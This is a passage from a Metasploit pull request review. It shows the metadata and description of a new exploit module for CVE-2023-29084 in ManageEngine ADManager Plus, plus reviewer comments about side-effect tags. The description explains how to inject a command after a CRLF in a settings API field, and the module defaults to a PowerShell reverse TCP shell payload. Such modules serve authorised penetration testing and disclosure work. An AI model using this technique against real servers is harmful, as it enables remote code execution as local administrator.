modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb

```diff
@@ -0,0 +1,225 @@
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  require 'json'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection',
+        'Description' => %q{
+          ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient
+          validation of user input when performing the ChangePasswordAction function before passing it into a string that is later
+          used as an OS command to execute.
+
+          By making a POST request to /api/json/admin/saveServerSettings with a params POST
+          parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a
+          carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user
+          running ADManager Plus, which will typically be the local administrator.
+
+          Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,
+          so this vulnerability does require authentication to exploit.
+        },
+        'Author' => [
+          'Simon Humbert', # Disclosure of bug via ZDI
+          'Dinh Hoang', # Aka hnd3884. Writeup and PoC
+          'Grant Willcox', # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-29084'],
+          ['URL', 'https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/'], # Writeup
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'], # ZDI Advisory
+          ['URL', 'https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html'], # Advisory
+          ['URL', 'https://www.manageengine.com/products/ad-manager/release-notes.html'] # Release Notes and Reporter Acknowledgement
+        ],
+        'DisclosureDate' => '2023-04-12',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true,
+        'Payload' => {
+          'BadChars' => "\x22\x0A\x0D\x00[{}]:," # Avoid double quotes, aka 0x22, and some other characters that might cause issues.
+        },
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } # cmd/windows/powershell_bind_tcp also works.
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8080
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
```

Comment:
I think we have a side effects tag for modules that make configuration changes. From the vulnerability description it sounds like a configuration change is taking place during the course of exploitation and that should be called out here.

Reply:
Will add `CONFIG_CHANGES` as a side effect here.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18018/commits/85f874a6d7b6c188eca83cd16d885b88a501f04e